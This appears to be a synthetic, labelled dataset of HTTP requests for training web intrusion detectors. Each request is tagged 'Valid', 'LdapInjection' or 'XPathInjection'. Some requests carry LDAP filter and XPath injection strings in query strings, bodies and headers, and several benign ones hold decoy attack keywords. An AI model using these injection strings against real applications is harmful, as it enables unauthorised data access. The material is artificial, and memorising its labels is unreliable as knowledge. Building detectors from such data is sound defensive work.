TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: TE
User-Agent: e5EMVXZ.o http://www.onbbei.it
UA-CPU: x86
UA-Disp: 2226,321,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1676x432
Via: FTP/4.2 2.83.253.143:05, HTTP/7.1 www.9572setg.shtml:038
Transfer-Encoding: compress
Upgrade: dog/2.3, ranys/6.1, ariu/3.6, aatroo/3.3, eb8/2.3
Warning: 148 www.lgd73e.png "ictnerAenruNu" 
X-Forwarded-For: 61.182.37.41
X-Serial-Number: 541499677250739
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 628
Start - Id: 37574
class: LdapInjection
PUT /rQ@SojXi/nIef/l2S/ea9e8utSNecueosert6o/kP5htaccesrW/unionKfY0dSMXbinP2.fJ.mspx? HTTP/1.0
Content-Length: 206
Content-Language: 7,eN
Content-Encoding: deflate
Content-Location: /1eoosgt.mdb
Content-MD5: ZWVhdERhY3Q2ZG9lZmFweg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Apr 04 21:56:55 GMT
Last-Modified: Thu, 24 Apr 08 03:40:27 UTC
Host: 146.164.255.71
Connection: close
Accept: application/zip;q=0.7, image/*;q=0.7, application/*
Accept-Charset: x-mac-ce;q=0.0, gb2312;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: s2ihmo-nh;q=0.8, yh-da3
Cache-Control: no-store
Client-ip: 234.104.82.80
Cookie: eeeouRzLjoRsisx=oa$qtp$;8sanestes=EotaacepDt;tatopdyei=e]ohtpassh p0ltpe+eie&xi
Cookie2: $Version="03"
Date: Wed, 15 Nov 06 15:41:48 UTC
ETag: W/"A92uOn1wRLAjIgH"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Tue, 16 Jan 07 07:40:26 GMT
If-Unmodified-Since: Mon, 06 Mar 06 23:22:28 GMT
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: *
Max-Forwards: 98
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: Basic YndhdmZiOjV5d2lr
Range: 36-,-7
Referer: /ioc1uha/sYailo.bin
TE: gzip;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.7 (X11; U; Open BSD i386 0.3; dT-3e; rv:7.1.1) Gecko/45858695
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 223x382
Via: FTP/0.8 www.5c0ma5fq.gif:70
Transfer-Encoding: fwfa4G; traj9y=Sargave
Upgrade: etMr/2.7
Warning: 065 105.103.99.69:35 "ltome" 
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

shluisos=1&as0rfhbucrs1Ltz=frmnbodqMalRrpe&2rljKrB=(rtgb&EIscnt6ue=nfqs-G&sbqiry=9488)(&(objectClass=deq)(|(sn =   aA)(cn=etAn     J*))&irlc0aTi=te-yx&aagBsnre=3sas&ltnp=2693

End - Id: 37574
Start - Id: 32346
class: Valid
GET /rQk5vyG-GU2Xwi@Okk/tespqsisd2tf/odBE9seV/fEkzt_G611AwRSH./pearo/gxoM@OX/ehlcess/SB4bM.cfm?Dlog4p=70&q50o=2ftrbt32lRe&3oeot=5 HTTP/1.1
Host: www.cnli.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, compress;q=0.5, gzip;q=0.6, identity, deflate;q=0.5
Accept-Language: *
Cache-Control: min-fresh=6
Cookie: CeLp=lrxb6R8Ts;nEvmen=fy;oz5Wrfeaiz1eygz=yna1;Rrep6oa7t=jSn-1t;fdd=atopenecphSnza8e3d9;cuseRdr=388
Cookie2: $Version="10"
Date: Sun, 12 Mar 06 23:01:24 GMT
ETag: "4zkQfXVaGHFY3daZ"
Expect: 100-continue
If-Modified-Since: Mon, 23 Apr 07 16:16:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Aug 08 12:16:02 GMT
Authorization: 8dlft y2soi=QiiAA
Referer: /a3nixrA.bin
Trailer: Range
User-Agent: Mozilla/7.5 (compatible; MSIE 8.1; Open BSD i586; ourhldnuL)
UA-OS: Linux
Via: 6.2 208.235.190.111, 3.3 212.242.163.244
Transfer-Encoding: keumat; eesdS=aahuWl
Upgrade: tlrho/7.0, ipgkmt/5.4, N6tro/0.6, NayNny/6.9
Warning: 204 68.50.220.254 "yElnoeD" 

null

End - Id: 32346
Start - Id: 19740
class: Valid
GET /formzXKiWJpiu/bZ0HoO/AVqFhavingJU-logb4lnetcatF/pand8YSd/euh9DlmsDphasaemE2tO/c6/58pSatrimts6rz/4GTf/c4NmTg/jTs85ypHRnH/aD7Zo1mjYm/MYXAJBd@bin.bin?hiotlyr=s6G&zft=4&maoanxnmde=5703618&f5KZ=%7Cy&xp495wAx=oehSiqo HTTP/1.1
Host: www.aeae8p7rea.it:80
Connection: 6qv2
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.3, identity;q=0.5, gzip
Accept-Language: lg-k2r, dh1er9G-vd;q=0.9, li-ePkaim;q=0.6, nE-vpav;q=0.6, tyAto-roan
Cache-Control: no-store
Client-ip: 207.179.57.163
Cookie: enwn=aZH9k56A4;Ircgrlsoimtaym=h
Cookie2: $Version="14"
Date: Sun, 30 May 04 01:39:21 UTC
ETag: "MpA374tHGJvwNKPP"
Expect: Ewse
From: iuIqi35@sebqclrtn.be
If-Modified-Since: Sun, 07 Mar 04 23:44:00 GMT
If-Unmodified-Since: Thu, 11 Feb 10 13:13:19 GMT
If-Match: "sp8U@MuChLi3ZmWy@6"
If-None-Match: *
If-Range: *
Max-Forwards: 458
MIME-Version: 8.6
Pragma: enhEY='edA8'
Proxy-Authorization: NTLM bHRIaXRocnN1YTZpczlEc2FpZWlhOW5hOXROdmNQb250cmhp
Authorization: Digest cnonce="ee6ss0re"
Range: 4774-
Referer: http://etdn.de/aoesc/k5lr/anat/ettt4s/rpatma.txt
TE: trailers,chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.3 (Windows; U; WinNT 6.9; oe-am; rv:9.6.0) Gecko/84824345
UA-CPU: PowerPC
UA-Disp: 666,3443,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3293x4610
Via: HTTP/7.5 www.aepnie.html, FTP/4.8 81.103.48.185, 7.5 203.119.106.210
Transfer-Encoding: tstpi1
Upgrade: no0E/0.8, 0wmAl/6.4, eee/7.7, 81t/9.2
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 43.198.16.171
X-Serial-Number: 465640999525707
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19740
Start - Id: 38456
class: LdapInjection
GET /sanuItpnoreu22c/agktscAoia7i.php?styleLjreplace=82%29%28%26%28objectClass%3DIeki%29%28%7C%28sn+++%3D++++l5f%29%28cn%3DCdj+++J*%29%29&edovnsc3m=301115715&NmnO=oiframeVaeraheC&FDKncb=%2Bh%24 HTTP/1.1
Host: www.tol1l.gov:80
Connection: 7uote
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 131.162.142.41
Cookie: ucHaiv=7i os;rsg=]em f;iphEo=6421;gyCsamLbstOx=eel
Cookie2: $Version="35"
Date: Tue, 07 Dec 04 10:18:31 UTC
ETag: W/"6u_ns_BxBlvp3Ise"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Sat, 23 Oct 04 23:16:31 UTC
If-Unmodified-Since: Fri, 23 Jan 04 01:43:42 CET
If-Match: "umgmdH3Pk..eY0_P0-hh"
If-None-Match: *
If-Range: "viw1wKSEZ6Drswu3r"
Max-Forwards: 921
MIME-Version: 3.3
Pragma: o3autEen=elpo
Proxy-Authorization: tkpee UiM63=shnNe4q
Authorization: NTLM bWU4OGNvNnNOOXJ1d3FOOW9oYXFmcjNvcm1hb3FlbGMzYXRhZWRydGV0M0E=
Range: 33-09668,018857-,31-3
Referer: /osiibsl/eksmmtqk/7pormeUa/s4tch/eedl.tar
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/8.6 (compatible; haec; WinNT; chbgm; lmtaihnvo; aDcehiele)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 2.4 www.oaneeeyt.gif:88210, refeaA/2.6 www.iOgN.html
Transfer-Encoding: identity
Upgrade: Sao/2.0
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38456
Start - Id: 27985
class: Valid
GET /JbZ0aYnw1Z/bD9yGEKjWXyVnVQ/puinep1fhe5z/elrtU/aFH.php3?o6w=sos&thlakphnMees=3zpin+Vtilinkio%28script+t&tso8vwoobelAr=gearmud%2Bor&kv0cbuniloZth=rilFatEllturkftr3su-&rXwgetj9home@boot.iniGmtk=6b1GVJVt10&TPhn7o=e%40c&d3hoeenzitptisr=%2Fno&hCt7yehsteg=r+&Wv1qbD=%2Fvbscriptdetwand%3B&1egQT=u8filth&.OzIK9S0-replaceI=rgH4wOEzXR.W&lzfCreesjln=A%5C-1%2Ft%5Dae&ooniir=9327877825&iryhbxot=t8GMRv&ldi=eYfBuMPQ6 HTTP/1.1
Host: www.ptee.com:167
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1257, iso-8859-8;q=0.6, utf-8;q=0.1, utf-8;q=0.1, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: pbetea-oi, tly4e-hh, orlemh-O2;q=0.3, a-npsnnza, aelyaJis-dmami7a;q=0.2
Cache-Control: no-store
Client-ip: 236.19.47.127
Cookie: dimDi8itfEij=1401;amotnarvtoTl=6992253;iii=Ei3EntaIsNdJcebot;ob.pfkCIIPlchild=tSe8Hg9r0c4M;ei04olPsnifrd=02
Cookie2: $Version="543"
Date: Tue, 05 Jan 10 08:24:36 UTC
ETag: "U-ZT.5xfVBto0SqZShW"
Expect: 100-continue
From: cdnx2t@ottOry6.gov
If-Modified-Since: Fri, 31 Dec 04 15:41:02 GMT
If-Unmodified-Since: Tue, 19 Jan 10 16:27:19 CET
If-Match: "zyPmLbxyr3eHJn7L"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.5
Pragma: e='eh'
Proxy-Authorization: Digest username="eAeuolls"
Authorization: Digest algorithm=MD5
Range: 26662-87
Referer: http://b6x7f3.com/e8td/efN6c/ntso/fernDt51/0ifTAe.asmx
TE: trailers,chunked;q=0.4,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 8.2; yM-Ta; rv:6.2.1) Gecko/82354117
UA-CPU: MIPS
UA-Disp: 629,775,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5151x4689
Via: 0.1 www.ngtuut2.css, 2.9 65.145.108.240, 4.1 www.fciil7.jpeg
Transfer-Encoding: identity
Upgrade: 5Dytss/2.7
Warning: 969 www.noihIl.css "easuh0yx4oo" 
X-Forwarded-For: 54.46.58.97
X-Serial-Number: 0515274937
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27985
Start - Id: 13614
class: Valid
GET /nlposnsap3t1YitSwre/3bZHLr8_pwB/htcgouRads/cs_nxdXEGQXjY9A5a85W/i4_9z/rtGjB/wzpassthruu.bin?zattyrhecNr=phT6UhUMgTIy&phpcyOXperl=iIi%3Cbetween&9cyeesT=sRnEXyuB2 HTTP/1.1
Host: www.ienibZur.org
Connection: mrSh
Accept: video/quicktime;q=0.6, image/*;q=0.8, image/*;q=0.7
Accept-Charset: isiri-3342, iso-8859-6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=761
Client-ip: 219.134.133.127
Cookie: ds=nezw6iey ;ryEMhikan=j9rrlovnaBhphpnr2
Cookie2: $Version="4"
Date: Tue, 08 Jan 08 23:40:30 UTC
ETag: "y_edEifPYWE54zi-v"
Expect: ehqiut=ieEeertr
From: b3vb@usAoAegiM.cz
If-Modified-Since: Fri, 13 Feb 04 21:08:12 UTC
If-Unmodified-Since: Sun, 16 May 04 21:55:23 UTC
If-Match: "hzqSZ3kxiiZfEMMg2."
If-None-Match: "F6jYmY43fPdawnDppn"
If-Range: *
Max-Forwards: 171
MIME-Version: 2.9
Pragma: eee=tmmoeaeu
Proxy-Authorization: NTLM bWVpNmFhc282ZGRzckh3bUl0dzhoNnJlaW83V2ZDb3RyU25z
Authorization: Digest qop=utuyieA
Range: 8-93898,-3983,-5248
Referer: /duhasr/3eIe/n4dboyw2/tgsf/sdUoO.tiff
TE: chunked;q=0.2
Trailer: From
User-Agent: leasey
UA-CPU: PowerPC
UA-Disp: 087,2562,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: 7.5 www.bnYir.htm:8, FTP/2.9 192.166.207.193
Transfer-Encoding: hsIqtv; eganan=Zrobtry
Upgrade: epo/2.1, usefho/7.3, bcr/7.2, eenh/7.9, ntye/2.0
Warning: 667 193.214.100.224:730 "rhuswliziie6a" "Sat, 17 Apr 04 22:29:46 CET"
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 5747927259472661
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13614
Start - Id: 24643
class: Valid
GET /txYx9HC9Fc8RSMFOZ/rb/xKbyEMgRQ@9dlsVxD/isnevoxAuCopn.html? HTTP/1.1
Host: www.rmbaOtai.ch
Connection: exagmrt
Accept: image/png, video/*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 96.133.72.174
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="442"
Date: Wed, 29 Jun 05 19:51:58 UTC
ETag: "M-V7te-sFzQ2U9uAuE"
Expect: 100-continue
From: fmet44t@idw1orkL6v.uk
If-Modified-Since: Thu, 17 Jun 04 18:37:08 UTC
If-Unmodified-Since: Wed, 14 Jun 06 20:14:37 UTC
If-Match: "Tig6Fj@pPTEwp71"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="h0elo"
Authorization: Basic YW5TY2FlZDpFc2hsbw==
Range: -59972,-4
Referer: /fe7s/iri2ta0o.mdb
TE: gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: aYd2xY http://www.nls2.de
UA-CPU: StrongARM
UA-Disp: 7015,359,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 803x2211
Via: 9tahi/4.3 www.tE5eede.js:3210, FTP/3.4 www.t9a0E.css, ispSd/0.3 www.fOwdeafn.jpeg
Transfer-Encoding: 3ucy; yidc=auawlf
Upgrade: erm/1.1, qamkie/3.0, 4Eloit/4.3, e8iif/6.9
Warning: 846 www.iihrevae.gif "eaehIhsswntnhuios8" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 24643
Start - Id: 48336
class: XPathInjection
GET /msrqtda/4hdltfe8y0/j54WhDfTP/JAREHuaO3SP/io4brfs-/7n7/cf7hUo/hyvtt7pn_/mwtiltf/h7Im1ocgtP2RdJUc.htm?mthitEinaph=179279474&Nnode@h=ugj_I35nLx HTTP/1.0
Host: 16.78.201.64:80
Connection: cb4pdlS
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate, identity;q=0.3
Accept-Language: oEfho3dh'   or     1<  ntcbh/si/yy/child::text()[position()=094]     or     'fe7'  =    '
Cache-Control: no-cache
Client-ip: 200.211.226.108
Cookie: ieoaRstwDai=eunion g @;httpQ8t5Kprocessing-instructionOscriptQ=eus;e9mF=oqenocaIn7oincludeh1 psystem/e;eaensimcseesg=aAv
Cookie2: $Version="20"
Date: Fri, 05 Oct 07 04:54:59 UTC
ETag: W/"O1taFi5ISjrTvrIqYlx"
Expect: irrcrOhb=R7oba;Cyuyei2a
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Tue, 13 Apr 04 16:43:24 UTC
If-Unmodified-Since: Thu, 21 Jul 05 11:30:04 UTC
If-Match: *
If-None-Match: "opVuVTz.OUB@D0otF"
If-Range: Sun, 20 Jun 04 22:50:38 CET
Max-Forwards: 96
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: NTLM c3R4ODZ2bk85aXN0ZXR0d3NlbHUzZHB0bnRocGhkcnRkYXJ6c0RlYmFNcDdu
Authorization: NTLM YW5vY2dzdHRCd2lyZVNFcm5uNmFpdGh5ZXRibHllcHY0eXNvZA==
Range: 8313-,-86247,250-55725
Referer: /aziO/edoi/0muac/Flk2nEho/8soe.gz
TE: deflate;q=0.6,chunked;q=0.0
Trailer: Warning
User-Agent: grrwkptona/2.1.7.2
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 433x249
Via: FTP/3.7 www.eepet.html, 9.4 www.atteR.css, 1.4 131.212.10.254
Transfer-Encoding: wp4w; VrrtiY=oLhhg
Upgrade: eta/7.4, auRa/8.4
Warning: 165 www.iteoh.html "CyaaaiPnNct5o" "Mon, 03 Apr 06 22:33:02 GMT"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 6875195
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48336
Start - Id: 25060
class: Valid
GET /wDm8s9my4KQ_pGbrdI/EnT5rttte/hkTA/.hnetcatGyFj/uoLtPE/shFcq/tAKgyim/biositwil/dKWz.NrQ336q/Tirf4mn53yore/0Zgk8ZvfFOeeNGfBqqol/hgmxe438ersiadt.shtml? HTTP/1.0
Host: 197.47.63.232
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5etmi-4chrtn9;q=0.5
Cache-Control: i1se6=n
Client-ip: 62.204.47.211
Cookie: oweff=Teigopeni;6msfwh5nnesiueu=1820;taEo=p8tnoaoecicfestaey;teYhiunopoijc=NeIlo2t;8aTue=sltta;mTrze=15463720
Cookie2: $Version="3"
Date: Fri, 04 Apr 08 02:28:10 GMT
ETag: "u248aUIf2HSJiI17"
Expect: 100-continue
From: sewds@ftsEgsr.net
If-Modified-Since: Wed, 03 Jun 09 02:33:29 UTC
If-Unmodified-Since: Wed, 17 Oct 07 09:11:45 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Feb 06 19:07:26 GMT
Max-Forwards: 96
MIME-Version: 0.1
Pragma: l=s
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: Basic bkUyb046eGVsbmE=
Range: 978-9166
Referer: http://www.menhehm.com/sad51/teemht.rar
TE: chunked;q=0.5,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: nPW@.cK http://www.wwr6lr.biz
UA-CPU: StrongARM
UA-Disp: 0739,480,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6866x078
Via: HTTP/9.5 84.117.46.127, 9.8 28.29.27.28
Transfer-Encoding: eslon
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 839 213.112.236.134:597 "Greakdulim" "Wed, 11 Mar 09 08:51:34 UTC"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25060
Start - Id: 11884
class: Valid
GET /3oedw1r6w3pl5ah.jpg?4alluHecho2.ULwK=mct%27Ymhh8xramaeu%25&5qNrt5mneFnd=%40va+u&aE8S25euTSH0a=otnt%2B&tcw1evcce1isfnp=1939664015&ygoalxa9lrn=grIL&22I=iant04giltado&Eirnm=ofVb-50YN-7.&d0hq3w71=8417&kreuue7etodhipn=ca6%7Eidead0s&rhEtsrur0m=iAX0K&eRoth660Yh2=aao&o7beNrnnrrsy=9 HTTP/1.1
Host: www.g4Nj.de
Connection: ths73czf
Accept: */*;q=0.3
Accept-Charset: iso-8859-7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 229.75.126.33
Cookie: sezhtcedeaok=o35o;ds=a3r;zQ_3=hmt;ans=e 0ay1i sa
Cookie2: $Version="7"
Date: Thu, 05 Jan 06 06:00:18 UTC
ETag: "legimXkD5odU3MO1."
Expect: 100-continue
From: letI@hnH5isut.cz
If-Modified-Since: Tue, 26 Jan 10 10:41:01 UTC
If-Unmodified-Since: Tue, 19 Dec 06 14:34:19 GMT
If-Match: *
If-None-Match: "BMIbp-oojcp10WGL2R4"
If-Range: "Z6tW1RF12sk6yXL"
Max-Forwards: 2
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/endan/Tetd/D6fo/7yLsrkns/eechst.jpg
Authorization: Basic dGV0c2lUbG46QXV0b2k=
Range: -35,-883,-072
Referer: /mmNlag/jat3Od/tiedi59u.asp
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: nroldihl6a (a9NAsiQN; tZy.0qYV0B; eyhw.ge)
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 151x6583
Via: FTP/0.6 www.omtufo.tiff, 6.1 73.68.207.212
Transfer-Encoding: compress
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 371 www.1cmlh.jpg "bnbD" "Tue, 30 Jun 09 11:03:01 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 11884
Start - Id: 2990
class: Valid
GET /an1Msa/td/hneblatexn/iocirnto.png?sjdI8arx3oe=534876&xtermoxdAjlTeS=5326932&cQL1o=Ue6e1olaacEegye&In2y8eif6yan=7 HTTP/1.1
Host: 92.251.100.177
Connection: ta3o
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, compress;q=0.5
Accept-Language: osersLda-rtsPts, a-e9;q=0.8, 8t-Nee7e
Cache-Control: min-fresh=2
Client-ip: 235.26.250.245
Cookie: ecO=88242;Ur3whyrsnn1i=Wv66c8lowronati
Cookie2: $Version="91"
Date: Tue, 26 Apr 05 10:01:54 GMT
ETag: "o942pdQXoL4kHmnt"
Expect: 100-continue
From: sMew@IhehlCaold.be
If-Modified-Since: Wed, 05 May 04 08:39:38 UTC
If-Unmodified-Since: Sun, 12 Nov 06 17:50:33 CET
If-Match: "d2u.xZoVT40vGJ-k"
If-None-Match: *
If-Range: Fri, 20 May 05 21:05:07 CET
Max-Forwards: 521
MIME-Version: 8.6
Pragma: mna9asqs=ti1iM
Proxy-Authorization: Digest uri=http://www.ls7i.fr/ag7sO/0eoi.nsf
Authorization: NTLM ZXJ0bFRkclRsclhmbGRpZ3NlZHNwZDNjUWV2cnRTZW5hc2kwbzVsZWNydWUyaGQ=
Range: -599,-46652
Referer: http://www.gontsse.be/ptig/AasHah.doc
TE: trailers
Trailer: Referer
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 3.6; e6-ui; rv:4.8.3) Gecko/00318838
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4979x0191
Via: 6.9 61.32.121.19:96654
Transfer-Encoding: gzip
Upgrade: er1/3.7, ohbtar/9.6, igrns/9.6, QebnrE/9.1, rWoN/5.7
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 200.70.38.178
X-Serial-Number: 39984855
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2990
Start - Id: 29536
class: Valid
GET /coo9Hrrdoocmfnnueho/qer4VdCpO7Erws-/v3AK.Zkp/r-Y_1OM8u/3uK0M2XFfP6zVI/bkrtcmrdobdoulis.css?tso6=ezo-W&Ui9daei5=t0ta+oa&leesku1f=totctln47m5G3lnnT&t0Wch=h%2Biww&Nmze9dInzt5AFs=8etx HTTP/1.1
Host: 21.239.181.239:80
Connection: g6fa
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: deflate, compress;q=0.3, compress;q=0.9
Accept-Language: idne8-i2n, se2ntt-Ch, zf0incOm-apuO;q=0.8, vob-se6
Cache-Control: max-age=90
Client-ip: 199.216.21.216
Cookie: rroy=zuI;gend69tBvnre=991;XLtK=07;vC6Y4leRodoapl=4029691976;ivn2sdesUA=Ty;6iq0nI=3jg
Cookie2: $Version="080"
Date: Sat, 02 Jan 10 11:05:18 GMT
ETag: W/"NDQW6P5-4Fw@IQFzmMn6"
Expect: 100-continue
From: rain@uiqt.com
If-Modified-Since: Tue, 05 Dec 06 03:36:33 GMT
If-Unmodified-Since: Fri, 24 Nov 06 22:54:31 GMT
If-Match: "1haSlaTfTe5OGaE"
If-None-Match: "FUHi3Njqe7D1odXws6C"
If-Range: Thu, 12 Oct 06 24:05:49 GMT
Max-Forwards: 0
MIME-Version: 6.1
Pragma: rq='f'
Proxy-Authorization: Basic ZWVnMmE6dGllSA==
Authorization: NTLM cmxhbnRlZW1vYWVjbmJvaG1oMTluaGNlb3RudG51ZXI=
Range: 577564-305453
Referer: http://www.oIei2itr.uk/wot6t5p.pdf
TE: deflate;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 9.7; kp-r7; rv:1.2.1) Gecko/70458516
UA-CPU: StrongARM
UA-Disp: 496,778,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3909x9569
Via: HTTP/1.3 www.3eon.gif, evEof/3.3 206.194.155.125, 4.8 www.eehnetor.html
Transfer-Encoding: tetng; oubnpere=esfTe
Upgrade: esen47/9.3, o2g/8.8, eeLM/5.1
Warning: 238 100.240.156.173:91606 "tbheEToeiftil5hig2" "Sun, 07 Nov 04 20:04:32 CET"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 935852027842714359
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29536
Start - Id: 19020
class: Valid
GET /esaoeFTsrmPHbHgrd/eeet93yrMriabl5aErri/cnKNegueromeejltei/lDlI/B0OKrwL2u6/pjzh2u.yUG/eIongHi/eouidk7qu3ree8nayn/txyM@T/d@oHf/.iDQ.htm?eaemeil1jLr=sH7bI7ZRU&sbuTegeugce=0Oihn&roiRgtf5=6sn HTTP/1.0
Host: www.guco5qst.net
Connection: keep-alive
Accept: text/plain
Accept-Charset: big5, iso-8859-5, gb2312, iso-8859-6, ks_c_5601-1987;q=0.2
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 203.235.99.136
Cookie: Leteni=tNsystem ;hqt0oaupaaltoi=nA.lPyhESiAQ
Cookie2: $Version="62"
Date: Tue, 27 May 08 10:32:25 CET
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 100-continue
From: hseomd@2oso.ch
If-Modified-Since: Tue, 14 Nov 06 13:43:25 UTC
If-Unmodified-Since: Wed, 14 Jan 09 12:09:55 GMT
If-Match: "0ZotTZt-X2hRw4fB@3l"
If-None-Match: *
If-Range: Wed, 27 Aug 08 07:57:47 UTC
Max-Forwards: 1447
MIME-Version: 8.1
Pragma: obegi=m0ndada
Proxy-Authorization: Digest response="d3EF6cFec42B33b63bdA11EE1B259cF4"
Authorization: Digest response="Cb0d27d861B4F0Aa3Be52a5CC1b6b34C"
Range: 970214-
Referer: /qheoirh.tar
TE: gzip
Trailer: If-Match
User-Agent: dfcbkom/2.4.0.3
UA-CPU: MIPS
UA-Disp: 8898,8815,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: FTP/9.6 175.193.240.95
Transfer-Encoding: deflate
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 116 170.222.10.170:68 "t5ueaspsrUFecey" "Tue, 17 Nov 09 03:08:22 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19020
Start - Id: 23519
class: Valid
GET /H8nexq6ieayetinqeheg/fkeeetnansiNooio9/lmi/tz7@DE3xvzD/snyCoG2b6gHp0T7SW-L/pVMH2D0/m3faawe/rhcapni5naf0yaesgds/pdFd9jlE/4tiwaonarI5omop.php3?eSs=bstdin&seegHo1s=46942629&nhh=869732&haGnwaskruq=odo9KsnechoOs+nescriptVtn&a5iee=trQ&nnGCebzthrtotuo=aTKZrPIaZru&aosuo6s=ijbneej2smqydhao&otOt=3trmK4w&rtoycptin=802&igSege=repassthrun HTTP/1.1
Host: 134.83.111.110:80
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 75.131.183.253
